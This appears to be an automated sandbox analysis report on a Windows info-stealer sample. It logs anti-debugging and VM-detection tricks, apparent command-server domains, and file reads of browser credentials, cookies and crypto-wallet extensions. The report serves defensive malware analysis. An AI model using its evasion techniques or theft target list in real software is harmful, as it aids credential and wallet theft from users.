              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360F04 second address: 5360F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360F08 second address: 5360FA5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD84520DEF8h 0x00000008 or ch, 00000008h 0x0000000b jmp 00007FD84520DEEBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007FD84520DEF8h 0x00000019 or si, 5E68h 0x0000001e jmp 00007FD84520DEEBh 0x00000023 popfd 0x00000024 popad 0x00000025 je 00007FD8B5AB190Ch 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FD84520DEEBh 0x00000034 sub cx, D1AEh 0x00000039 jmp 00007FD84520DEF9h 0x0000003e popfd 0x0000003f call 00007FD84520DEF0h 0x00000044 pop esi 0x00000045 popad 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360FA5 second address: 5360FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5360FAB second address: 5360FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 537096D second address: 5370A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 1Fh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ch, 50h 0x0000000c popad 0x0000000d mov dword ptr [esp], ebp 0x00000010 jmp 00007FD84502495Fh 0x00000015 mov ebp, esp 0x00000017 jmp 00007FD845024966h 0x0000001c xchg eax, esi 0x0000001d jmp 00007FD845024960h 0x00000022 push eax 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FD845024961h 0x0000002a add si, 6346h 0x0000002f jmp 00007FD845024961h 0x00000034 popfd 0x00000035 jmp 00007FD845024960h 0x0000003a popad 0x0000003b xchg eax, esi 0x0000003c jmp 00007FD845024960h 0x00000041 mov esi, dword ptr [ebp+0Ch] 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007FD84502495Dh 0x0000004b adc ax, C606h 0x00000050 jmp 00007FD845024961h 0x00000055 popfd 0x00000056 popad 0x00000057 test esi, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370A34 second address: 5370A47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD84520DEEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370A47 second address: 5370AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 874Ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FD8B58C22BCh 0x00000010 pushad 0x00000011 jmp 00007FD845024963h 0x00000016 pushfd 0x00000017 jmp 00007FD845024968h 0x0000001c xor esi, 15E5C968h 0x00000022 jmp 00007FD84502495Bh 0x00000027 popfd 0x00000028 popad 0x00000029 cmp dword ptr [75C7459Ch], 05h 0x00000030 jmp 00007FD845024966h 0x00000035 je 00007FD8B58DA339h 0x0000003b pushad 0x0000003c mov di, si 0x0000003f movzx esi, dx 0x00000042 popad 0x00000043 push ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FD845024961h 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370AD6 second address: 5370ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370ADC second address: 5370AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370AE0 second address: 5370AE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370AE4 second address: 5370B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FD84502495Bh 0x00000012 mov bx, ax 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370B18 second address: 5370B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370B1C second address: 5370B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD845024961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370B31 second address: 5370B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370B37 second address: 5370B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370B3B second address: 5370B3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370B3F second address: 5370B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a push ecx 0x0000000b push edi 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 mov edi, ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370BE1 second address: 5370BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRDTSC instruction interceptor: First address: 5370BE5 second address: 5370C06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 mov esi, edx 0x0000000b mov ecx, ebx 0x0000000d popad 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD845024960h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSpecial instruction interceptor: First address: AC8BB6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSpecial instruction interceptor: First address: 928D26 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSpecial instruction interceptor: First address: B5D66E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exe TID: 7412Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exe TID: 7408Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: oe9KS7ZHUc.exe, oe9KS7ZHUc.exe, 00000000.00000002.1978602900.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738667408.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782547365.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977872773.0000000001428000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1978228463.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1760100558.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1896077243.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977872773.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000002.1979555678.0000000001428000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1862932462.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001478000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738667408.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782547365.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1978228463.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1760100558.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1896077243.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977872773.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1862932462.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1782732973.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1973660158.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000002.1979674828.0000000001478000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
              Source: oe9KS7ZHUc.exe, 00000000.00000002.1978602900.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: SICE
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: oe9KS7ZHUc.exeString found in binary or memory: hummskitnj.buzz
              Source: oe9KS7ZHUc.exeString found in binary or memory: appliacnesot.buzz
              Source: oe9KS7ZHUc.exeString found in binary or memory: cashfuzysao.buzz
              Source: oe9KS7ZHUc.exeString found in binary or memory: inherineau.buzz
              Source: oe9KS7ZHUc.exeString found in binary or memory: screwamusresz.buzz
              Source: oe9KS7ZHUc.exeString found in binary or memory: rebuildeso.buzz
              Source: oe9KS7ZHUc.exeString found in binary or memory: scentniej.buzz
              Source: oe9KS7ZHUc.exeString found in binary or memory: mindhandru.buzz
              Source: oe9KS7ZHUc.exeString found in binary or memory: prisonyfork.buzz
              Source: oe9KS7ZHUc.exe, oe9KS7ZHUc.exe, 00000000.00000002.1978927817.0000000000AEF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1896012775.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1913347271.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000002.1979741817.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1973506829.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977872773.0000000001442000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1977808200.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1896077243.0000000001478000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1896190150.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1914035137.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, oe9KS7ZHUc.exe, 00000000.00000003.1895900220.00000000014D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: oe9KS7ZHUc.exe PID: 7292, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1896127299.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1896127299.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: oe9KS7ZHUc.exeString found in binary or memory: Jaxx Liberty
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1896308244.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1896308244.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1810056487.0000000005CAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1896308244.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\oe9KS7ZHUc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
